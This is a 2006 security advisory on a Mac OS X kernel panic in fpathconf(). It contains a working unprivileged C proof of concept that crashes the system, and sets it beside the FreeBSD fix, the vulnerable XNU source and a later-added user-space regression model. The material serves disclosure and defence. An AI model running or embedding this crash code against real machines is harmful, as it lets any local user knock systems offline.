  Mac OS X fpathconf() DoS

From:
Date:11.11.2006
Subject:MOKB-09-11-2006

Title: Mac OS X fpathconf() syscall denial of service
Description: Failure to handle unknown file types by the Mac OS X kernel (XNU) fpathconf() syscall causes a kernel panic, leading to an exploitable local denial of service by non-privileged users. The bug was fixed by FreeBSD on Tue Jun 27 23:08:36 2000 UTC (6 years, 4 months ago).
Author/Contributor: Ilja Van Sprundel - found the issue and reported it to Apple some time ago (silently, yet only partially, fixed; thus still broken).
LMH <lmh[at]info-pull.com> - MOKB release, "proof of concept".
References:

Proof of concept or exploit: One-liner:

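#include <fcntl.h>      /* O_CREAT */
#include <sys/stat.h>   /* S_IRWXU */
#include <unistd.h>
#include <semaphore.h>

int main() {
       /* fpathconf() on a semaphore handle: a file type the syscall does not handle */
       fpathconf(sem_open("DaringWussball", O_CREAT, S_IRWXU, 1), 0);
}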


Debugging information:

It's been tested on an up-to-date (09-11-2006) Mac OS X installation, running on an Intel "shipping" Mac.

rome:~ lmh$ uname -a
Darwin rome.local 8.8.1 Darwin Kernel Version 8.8.1: Mon Sep 25 19:42:00 PDT 2006;
root:xnu-792.13.8.obj~1/RELEASE_I386 i386 i386

===================================================================
RCS file: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v
retrieving revision 1.84
retrieving revision 1.85
diff -u -p -r1.84 -r1.85
--- src/sys/kern/kern_descrip.c 2000/05/26 02:04:33 1.84
+++ src/sys/kern/kern_descrip.c 2000/06/27 23:08:36 1.85 <--- 6 years, 4 months ago
@@ -36,7 +36,7 @@
 * SUCH DAMAGE.
 *
 * @(#)kern_descrip.c 8.6 (Berkeley) 4/19/94
- * $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.84 2000/05/26 02:04:33 jake Exp $
+ * $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.85 2000/06/27 23:08:36 alfred Exp $
 */

#include "opt_compat.h"
@@ -642,7 +642,7 @@ fpathconf(p, uap)
return (VOP_PATHCONF(vp, uap->name, p->p_retval));

default:
- panic("fpathconf");
+ return (EOPNOTSUPP);
}
/*NOTREACHED*/
}
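Review bot: the new default: branch returns EOPNOTSUPP with no comment saying that it is reachable from userland by any descriptor type the switch does not list, which is why panic("fpathconf") was the wrong response there; a one-line comment above `return (EOPNOTSUPP);` would keep a later cleanup from turning it back into an assertion. EOPNOTSUPP also becomes a new user-visible error for fpathconf(), so the manual page's ERRORS section should list it. The /*NOTREACHED*/ after the switch still holds for the branches visible here, since both return.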

------ xnu-792.6.76/bsd/kern/kern_descrip.c
/*
 * Return pathconf information about a file descriptor.
 */
int
fpathconf(p, uap, retval)
    struct proc *p;
    register struct fpathconf_args *uap;
    register_t *retval;
{
    int fd = uap->fd;
    struct fileproc *fp;
    struct vnode *vp;
    struct vfs_context context;
    int error = 0;
    short type;
    caddr_t data;


    AUDIT_ARG(fd, uap->fd);
    if ( (error = fp_lookup(p, fd, &fp, 0)) )
        return(error);
    type = fp->f_type;
    data = fp->f_data;

    switch (type) {

    case DTYPE_SOCKET:
        (...)
        error = 0;
        goto out;

    case DTYPE_PIPE:
        *retval = PIPE_BUF;
        error = 0;
        goto out;

    case DTYPE_VNODE:
        (...)
        goto out;

    case DTYPE_PSXSHM:
    case DTYPE_KQUEUE:
        error = EINVAL;
        goto out;

    default:
        panic("fpathconf (unrecognized - %d)", type);   <----- not covered cases, panic.
    }
    /*NOTREACHED*/
out:
    fp_drop(p, fd, fp, 0);
    return(error);
}
------ xnu-792.6.76/bsd/kern/kern_descrip.c
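
The difference between the two default branches shown above, as an added example that is not part of the original advisory or of the XNU or FreeBSD sources: a user-space model in which a counter stands in for panic(), so a sweep over every type tag shows which ones reach the fatal path. The DT_* tags and their values, MODEL_PIPE_BUF, fpathconf_model() and sweep() are hypothetical names constructed for this illustration.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed type tags (hypothetical, not XNU's values). DT_UNLISTED
 * stands for any descriptor type the switch has no case for. */
enum { DT_VNODE = 1, DT_SOCKET, DT_PSXSHM, DT_UNLISTED, DT_KQUEUE, DT_PIPE, DT_MAX };
#define MODEL_PIPE_BUF 512L   /* constructed stand-in for PIPE_BUF */

static int panics;            /* counts hits on the modelled panic() */

/* Model of the dispatch. legacy != 0: default branch as in the XNU excerpt
 * (fatal). legacy == 0: default branch as in FreeBSD revision 1.85. */
static int fpathconf_model(int type, int legacy, long *retval)
{
    switch (type) {
    case DT_SOCKET:           /* bodies elided on the page; modelled as success */
    case DT_VNODE:
        *retval = 0;
        return 0;
    case DT_PIPE:
        *retval = MODEL_PIPE_BUF;
        return 0;
    case DT_PSXSHM:
    case DT_KQUEUE:
        return EINVAL;
    default:
        if (legacy) {
            panics++;         /* a kernel would stop here */
            return -1;
        }
        return EOPNOTSUPP;    /* caller gets an errno, system keeps running */
    }
}

/* Regression sweep: feed every tag, including out-of-range ones, and
 * report how many reached the fatal path. */
static int sweep(int legacy)
{
    long v = 0;
    panics = 0;
    for (int t = 0; t <= DT_MAX; t++)
        (void)fpathconf_model(t, legacy, &v);
    return panics;
}

int main(void)
{
    printf("legacy default:   %d tag(s) reach panic\n", sweep(1));
    printf("hardened default: %d tag(s) reach panic\n", sweep(0));
    return 0;
}
```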
